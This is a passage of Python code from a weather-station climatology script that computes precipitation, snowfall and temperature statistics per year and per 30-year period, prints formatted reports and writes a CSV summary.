e[YYYY]["snow"].append(round(float(clmt[y][m][d].snow),2)) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1 if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow == "" and clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1 # TAVG if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= 
int(clmt[y][m][d].tmin): e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) # TMAX if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: if clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): e[YYYY]["tmax"].append(int(clmt[y][m][d].tmax)) # TMIN if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: if clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax): e[YYYY]["tmin"].append(int(clmt[y][m][d].tmin)) incr_day += datetime.timedelta(days=1) # GO ON TO TEST NEXT DAY for YYYY in e: #print('e[{}]["prcpDAYS"] = {}'.format(YYYY,e[YYYY]["prcpDAYS"])) #print('sum(e[{}]["prcp"] = {})'.format(YYYY,sum(e[YYYY]["prcp"]))) #print("----") #print('alltime["prcpPROP"]["e_max_days"][0] = {}'.format(alltime["prcpPROP"]["e_max_days"][0])) #print('alltime["prcpPROP"]["e_max_days"][1] = {}'.format(alltime["prcpPROP"]["e_max_days"][1])) #print('alltime["prcpPROP"]["e_max"][0] = {}'.format(alltime["prcpPROP"]["e_max"][0])) #print('alltime["prcpPROP"]["e_max"][1] = {}'.format(alltime["prcpPROP"]["e_max"][1])) #input("----") alltime["total_days"] += e[YYYY]["recordqty"] # PRCP alltime["prcp"].append(sum(e[YYYY]["prcp"])) alltime["prcpPROP"]["days"] += e[YYYY]["prcpDAYS"] if e[YYYY]["prcpDAYS"] == alltime["prcpPROP"]["e_max_days"][0]: alltime["prcpPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] > alltime["prcpPROP"]["e_max_days"][0]: alltime["prcpPROP"]["e_max_days"][0] = e[YYYY]["prcpDAYS"] alltime["prcpPROP"]["e_max_days"][1] = [] alltime["prcpPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == alltime["prcpPROP"]["e_max"][0]: alltime["prcpPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) > alltime["prcpPROP"]["e_max"][0]: alltime["prcpPROP"]["e_max"][0] = sum(e[YYYY]["prcp"]) alltime["prcpPROP"]["e_max"][1] = [] alltime["prcpPROP"]["e_max"][1].append(YYYY) if 
e[YYYY]["recordqty"] > EXCLD: if e[YYYY]["prcpDAYS"] == alltime["prcpPROP"]["e_min_days"][0]: alltime["prcpPROP"]["e_min_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] < alltime["prcpPROP"]["e_min_days"][0]: alltime["prcpPROP"]["e_min_days"][0] = e[YYYY]["prcpDAYS"] alltime["prcpPROP"]["e_min_days"][1] = [] alltime["prcpPROP"]["e_min_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == alltime["prcpPROP"]["e_min"][0]: alltime["prcpPROP"]["e_min"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) < alltime["prcpPROP"]["e_min"][0]: alltime["prcpPROP"]["e_min"][0] = sum(e[YYYY]["prcp"]) alltime["prcpPROP"]["e_min"][1] = [] alltime["prcpPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(e[YYYY]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += e[YYYY]["prcpDAYS"] climo30yrs[c]["total_days"] += e[YYYY]["recordqty"] if e[YYYY]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["e_max_days"][0]: climo30yrs[c]["prcpPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["e_max_days"][0]: climo30yrs[c]["prcpPROP"]["e_max_days"][0] = e[YYYY]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["e_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == climo30yrs[c]["prcpPROP"]["e_max"][0]: climo30yrs[c]["prcpPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) > climo30yrs[c]["prcpPROP"]["e_max"][0]: climo30yrs[c]["prcpPROP"]["e_max"][0] = sum(e[YYYY]["prcp"]) climo30yrs[c]["prcpPROP"]["e_max"][1] = [] climo30yrs[c]["prcpPROP"]["e_max"][1].append(YYYY) if e[YYYY]["recordqty"] > EXCLD: if e[YYYY]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["e_min_days"][0]: climo30yrs[c]["prcpPROP"]["e_min_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["e_min_days"][0]: climo30yrs[c]["prcpPROP"]["e_min_days"][0] = e[YYYY]["prcpDAYS"] 
climo30yrs[c]["prcpPROP"]["e_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["e_min_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == climo30yrs[c]["prcpPROP"]["e_min"][0]: climo30yrs[c]["prcpPROP"]["e_min"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) < climo30yrs[c]["prcpPROP"]["e_min"][0]: climo30yrs[c]["prcpPROP"]["e_min"][0] = sum(e[YYYY]["prcp"]) climo30yrs[c]["prcpPROP"]["e_min"][1] = [] climo30yrs[c]["prcpPROP"]["e_min"][1].append(YYYY) # SNOW alltime["snow"].append(sum(e[YYYY]["snow"])) alltime["snowPROP"]["days"] += e[YYYY]["snowDAYS"] if e[YYYY]["snowDAYS"] == alltime["snowPROP"]["e_max_days"][0]: alltime["snowPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["snowDAYS"] > alltime["snowPROP"]["e_max_days"][0]: alltime["snowPROP"]["e_max_days"][0] = e[YYYY]["snowDAYS"] alltime["snowPROP"]["e_max_days"][1] = [] alltime["snowPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["snow"]) == alltime["snowPROP"]["e_max"][0]: alltime["snowPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["snow"]) > alltime["snowPROP"]["e_max"][0]: alltime["snowPROP"]["e_max"][0] = sum(e[YYYY]["snow"]) alltime["snowPROP"]["e_max"][1] = [] alltime["snowPROP"]["e_max"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(e[YYYY]["snow"])) climo30yrs[c]["snowPROP"]["days"] += e[YYYY]["snowDAYS"] if e[YYYY]["snowDAYS"] == climo30yrs[c]["snowPROP"]["e_max_days"][0]: climo30yrs[c]["snowPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["snowDAYS"] > climo30yrs[c]["snowPROP"]["e_max_days"][0]: climo30yrs[c]["snowPROP"]["e_max_days"][0] = e[YYYY]["snowDAYS"] climo30yrs[c]["snowPROP"]["e_max_days"][1] = [] climo30yrs[c]["snowPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["snow"]) == climo30yrs[c]["snowPROP"]["e_max"][0]: climo30yrs[c]["snowPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["snow"]) > climo30yrs[c]["snowPROP"]["e_max"][0]: 
climo30yrs[c]["snowPROP"]["e_max"][0] = sum(e[YYYY]["snow"]) climo30yrs[c]["snowPROP"]["e_max"][1] = [] climo30yrs[c]["snowPROP"]["e_max"][1].append(YYYY) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in e[YYYY]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(e[YYYY]["tempAVGlist"]) > EXCLD * 2: alltime["tempAVGlist"].append(mean(e[YYYY]["tempAVGlist"])) if mean(e[YYYY]["tempAVGlist"]) == alltime["tavgPROP"]["e_max"][0]: alltime["tavgPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) > alltime["tavgPROP"]["e_max"][0]: alltime["tavgPROP"]["e_max"][0] = mean(e[YYYY]["tempAVGlist"]) alltime["tavgPROP"]["e_max"][1] = [] alltime["tavgPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tempAVGlist"]) == alltime["tavgPROP"]["e_min"][0]: alltime["tavgPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) < alltime["tavgPROP"]["e_min"][0]: alltime["tavgPROP"]["e_min"][0] = mean(e[YYYY]["tempAVGlist"]) alltime["tavgPROP"]["e_min"][1] = [] alltime["tavgPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in e[YYYY]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(e[YYYY]["tempAVGlist"]) > EXCLD * 2: climo30yrs[c]["tempAVGlist"].append(mean(e[YYYY]["tempAVGlist"])) if mean(e[YYYY]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["e_max"][0]: climo30yrs[c]["tavgPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["e_max"][0]: climo30yrs[c]["tavgPROP"]["e_max"][0] = mean(e[YYYY]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["e_max"][1] = [] climo30yrs[c]["tavgPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["e_min"][0]: climo30yrs[c]["tavgPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) < 
climo30yrs[c]["tavgPROP"]["e_min"][0]: climo30yrs[c]["tavgPROP"]["e_min"][0] = mean(e[YYYY]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["e_min"][1] = [] climo30yrs[c]["tavgPROP"]["e_min"][1].append(YYYY) # TMAX for x in e[YYYY]["tmax"]: alltime["tmax"].append(x) if len(e[YYYY]["tmax"]) > EXCLD: if mean(e[YYYY]["tmax"]) == alltime["tmaxPROP"]["e_max"][0]: alltime["tmaxPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) > alltime["tmaxPROP"]["e_max"][0]: alltime["tmaxPROP"]["e_max"][0] = mean(e[YYYY]["tmax"]) alltime["tmaxPROP"]["e_max"][1] = [] alltime["tmaxPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmax"]) == alltime["tmaxPROP"]["e_min"][0]: alltime["tmaxPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) < alltime["tmaxPROP"]["e_min"][0]: alltime["tmaxPROP"]["e_min"][0] = mean(e[YYYY]["tmax"]) alltime["tmaxPROP"]["e_min"][1] = [] alltime["tmaxPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in e[YYYY]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(e[YYYY]["tmax"]) > EXCLD: if mean(e[YYYY]["tmax"]) == climo30yrs[c]["tmaxPROP"]["e_max"][0]: climo30yrs[c]["tmaxPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) > climo30yrs[c]["tmaxPROP"]["e_max"][0]: climo30yrs[c]["tmaxPROP"]["e_max"][0] = mean(e[YYYY]["tmax"]) climo30yrs[c]["tmaxPROP"]["e_max"][1] = [] climo30yrs[c]["tmaxPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmax"]) == climo30yrs[c]["tmaxPROP"]["e_min"][0]: climo30yrs[c]["tmaxPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) < climo30yrs[c]["tmaxPROP"]["e_min"][0]: climo30yrs[c]["tmaxPROP"]["e_min"][0] = mean(e[YYYY]["tmax"]) climo30yrs[c]["tmaxPROP"]["e_min"][1] = [] climo30yrs[c]["tmaxPROP"]["e_min"][1].append(YYYY) # TMIN for x in e[YYYY]["tmin"]: alltime["tmin"].append(x) if len(e[YYYY]["tmin"]) > EXCLD: if mean(e[YYYY]["tmin"]) == alltime["tminPROP"]["e_max"][0]: 
alltime["tminPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) > alltime["tminPROP"]["e_max"][0]: alltime["tminPROP"]["e_max"][0] = mean(e[YYYY]["tmin"]) alltime["tminPROP"]["e_max"][1] = [] alltime["tminPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmin"]) == alltime["tminPROP"]["e_min"][0]: alltime["tminPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) < alltime["tminPROP"]["e_min"][0]: alltime["tminPROP"]["e_min"][0] = mean(e[YYYY]["tmin"]) alltime["tminPROP"]["e_min"][1] = [] alltime["tminPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in e[YYYY]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(e[YYYY]["tmin"]) > EXCLD: if mean(e[YYYY]["tmin"]) == climo30yrs[c]["tminPROP"]["e_max"][0]: climo30yrs[c]["tminPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) > climo30yrs[c]["tminPROP"]["e_max"][0]: climo30yrs[c]["tminPROP"]["e_max"][0] = mean(e[YYYY]["tmin"]) climo30yrs[c]["tminPROP"]["e_max"][1] = [] climo30yrs[c]["tminPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmin"]) == climo30yrs[c]["tminPROP"]["e_min"][0]: climo30yrs[c]["tminPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmin"]) < climo30yrs[c]["tminPROP"]["e_min"][0]: climo30yrs[c]["tminPROP"]["e_min"][0] = mean(e[YYYY]["tmin"]) climo30yrs[c]["tminPROP"]["e_min"][1] = [] climo30yrs[c]["tminPROP"]["e_min"][1].append(YYYY) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for {} {} thru {} {}".format(calendar.month_abbr[startday.month],startday.day,calendar.month_abbr[endday.month],endday.day)) print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") 
print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^12} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^12} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^12} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["e_max_days"][0], alltime["prcpPROP"]["e_max_days"][1][0] if len(alltime["prcpPROP"]["e_max_days"][1]) == 1 else len(alltime["prcpPROP"]["e_max_days"][1]), alltime["prcpPROP"]["e_min_days"][0], alltime["prcpPROP"]["e_min_days"][1][0] if len(alltime["prcpPROP"]["e_min_days"][1]) == 1 else len(alltime["prcpPROP"]["e_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["e_max"][0],2), alltime["prcpPROP"]["e_max"][1][0] if len(alltime["prcpPROP"]["e_max"][1]) == 1 else len(alltime["prcpPROP"]["e_max"][1]), round(alltime["prcpPROP"]["e_min"][0],2), alltime["prcpPROP"]["e_min"][1][0] if len(alltime["prcpPROP"]["e_min"][1]) == 1 else len(alltime["prcpPROP"]["e_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["e_max_days"][0], alltime["snowPROP"]["e_max_days"][1][0] if len(alltime["snowPROP"]["e_max_days"][1]) == 1 else len(alltime["snowPROP"]["e_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", 
round(alltime["snowPROP"]["e_max"][0],2), alltime["snowPROP"]["e_max"][1][0] if len(alltime["snowPROP"]["e_max"][1]) == 1 else len(alltime["snowPROP"]["e_max"][1]))) for c in climo30yrs: try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["e_max_days"][0], climo30yrs[c]["prcpPROP"]["e_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_max_days"][1]), climo30yrs[c]["prcpPROP"]["e_min_days"][0], climo30yrs[c]["prcpPROP"]["e_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["e_max"][0],2), climo30yrs[c]["prcpPROP"]["e_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_max"][1]), round(climo30yrs[c]["prcpPROP"]["e_min"][0],2), climo30yrs[c]["prcpPROP"]["e_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["e_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["e_max_days"][0], climo30yrs[c]["snowPROP"]["e_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["e_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["e_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["e_max"][0],2), climo30yrs[c]["snowPROP"]["e_max"][1][0] if len(climo30yrs[c]["snowPROP"]["e_max"][1]) == 1 else 
len(climo30yrs[c]["snowPROP"]["e_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["e_max"][0],1), alltime["tavgPROP"]["e_max"][1][0] if len(alltime["tavgPROP"]["e_max"][1]) == 1 else len(alltime["tavgPROP"]["e_max"][1]), round(alltime["tavgPROP"]["e_min"][0],1), alltime["tavgPROP"]["e_min"][1][0] if len(alltime["tavgPROP"]["e_min"][1]) == 1 else len(alltime["tavgPROP"]["e_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["e_max"][0],1), alltime["tmaxPROP"]["e_max"][1][0] if len(alltime["tmaxPROP"]["e_max"][1]) == 1 else len(alltime["tmaxPROP"]["e_max"][1]), round(alltime["tmaxPROP"]["e_min"][0],1), alltime["tmaxPROP"]["e_min"][1][0] if len(alltime["tmaxPROP"]["e_min"][1]) == 1 else len(alltime["tmaxPROP"]["e_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["e_max"][0],1), alltime["tminPROP"]["e_max"][1][0] if len(alltime["tminPROP"]["e_max"][1]) == 1 else len(alltime["tminPROP"]["e_max"][1]), round(alltime["tminPROP"]["e_min"][0],1), 
alltime["tminPROP"]["e_min"][1][0] if len(alltime["tminPROP"]["e_min"][1]) == 1 else len(alltime["tminPROP"]["e_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["e_max"][0],1), climo30yrs[c]["tavgPROP"]["e_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["e_max"][1]), round(climo30yrs[c]["tavgPROP"]["e_min"][0],1), climo30yrs[c]["tavgPROP"]["e_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["e_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["e_max"][0],1), climo30yrs[c]["tmaxPROP"]["e_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["e_max"][1]), round(climo30yrs[c]["tmaxPROP"]["e_min"][0],1), climo30yrs[c]["tmaxPROP"]["e_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["e_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["e_max"][0],1), climo30yrs[c]["tminPROP"]["e_max"][1][0] if len(climo30yrs[c]["tminPROP"]["e_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["e_max"][1]), round(climo30yrs[c]["tminPROP"]["e_min"][0],1), climo30yrs[c]["tminPROP"]["e_min"][1][0] if len(climo30yrs[c]["tminPROP"]["e_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["e_min"][1]))) except Exception as er: print("ERROR: Era = {}; Exception = {}".format(c,er)) print("") if output == True: newfn = "customReport_{}{}to{}{}_".format(calendar.month_abbr[m1],d1,calendar.month_abbr[m2],d2) + 
str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period ({}{} to {}{})".format(calendar.month_abbr[m1],d1,calendar.month_abbr[m2],d2),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") 
w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def dayRank(m,d,qty): """Returns a list of rankings (maxs and mins) based on a specific day of a specific month. It only accepts arguments for the month, day, and the how many rankings you want to list (ie, top 10; 15; etc). Passed arguments MUST be integers. dayRank(month,day,quantity) EXAMPLE: dayRank(6,27) -> Returns rankings for June 27 """ class day_attr: def __init__(self,y,number): self.year = y self.number = number if type(m) != int or type(d) != int or type(qty) != int: return print("* SORRY! Month AND Day need to be submitted as integers") if m < 1 or m > 12: return print("* Sorry! Make sure month entry is in the range [1,12]") if d < 1 or d > 31: return print("* Sorry! Invalid Day entered.") if m in [4,6,9,11] and d == 31: return print("*Sorry! Only months numbered 1,3,5,7,8,10,12 have 31 days") if m == 2 and d > 29: return print("* Sorry! February never has 30+ days") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! 
